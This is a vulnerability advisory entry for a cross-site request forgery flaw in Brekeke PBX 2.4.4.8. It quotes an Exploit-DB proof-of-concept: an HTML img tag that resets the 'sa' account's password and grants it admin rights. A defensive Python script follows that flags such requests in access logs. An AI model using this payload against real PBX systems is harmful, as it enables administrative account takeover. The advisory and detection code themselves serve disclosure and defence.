Vendor: Brekeke PBX
By: Unknown
CVSS: 5.5 (MEDIUM)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Brekeke PBX
Affected Version From: 2.4.4.8
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:brekeke:brekeke_pbx:2.4.4.8
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Cross-Site Request Forgery in Brekeke PBX

The vulnerability allows a remote attacker to perform administrative actions and gain unauthorized access to the affected application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40407/info

Brekeke PBX is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected. 

<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html>
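
A defender-side check for the request shown above, as an added example that is not part of the original advisory or of Brekeke's software: it scans web access logs for /pbx/gate requests carrying operation=store and reports those whose Referer is missing or is not the PBX's own origin. The combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a front-end proxy writes combined-format access logs for the PBX.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# host:port the admin UI is served from (the host used in the advisory's URL).
TRUSTED_HOSTS = {"www.example.com:28080"}

# Constructed sample lines (not real traffic); query strings are shortened.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&admin=true&operation=store HTTP/1.1" 200 512 "http://forum.example.net/thread/12" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] "GET /pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&admin=true&operation=store HTTP/1.1" 200 512 "http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.22 - - [01/Jan/2024:10:07:00 +0000] "GET /pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&operation=store HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def inspect_line(line, trusted=TRUSTED_HOSTS):
    """Return a finding for a store request to /pbx/gate, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    q = parse_qs(url.query, keep_blank_values=True)
    if url.path != "/pbx/gate" or q.get("operation") != ["store"]:
        return None
    ref = m["referer"]
    ref_host = urlsplit(ref).netloc.lower() if ref not in ("", "-") else None
    if ref_host is None:
        verdict = "no-referer"      # header stripped or absent: needs manual review
    elif ref_host in trusted:
        verdict = "same-origin"
    else:
        verdict = "cross-origin"    # request was triggered from a page on another site
    # Parameter values such as password are deliberately left out of the finding.
    return {"client": m["ip"], "time": m["ts"], "method": m["method"],
            "bean": q.get("bean", [""])[0], "user": q.get("user", [""])[0],
            "grants_admin": q.get("admin") == ["true"],
            "referer_host": ref_host, "verdict": verdict}


def suspicious(lines):
    """Findings for store requests that did not originate from the PBX's own pages."""
    return [f for f in map(inspect_line, lines) if f and f["verdict"] != "same-origin"]
```

Because the request places the new password in the query string, the access logs themselves hold credentials and should be access-controlled like any other secret store.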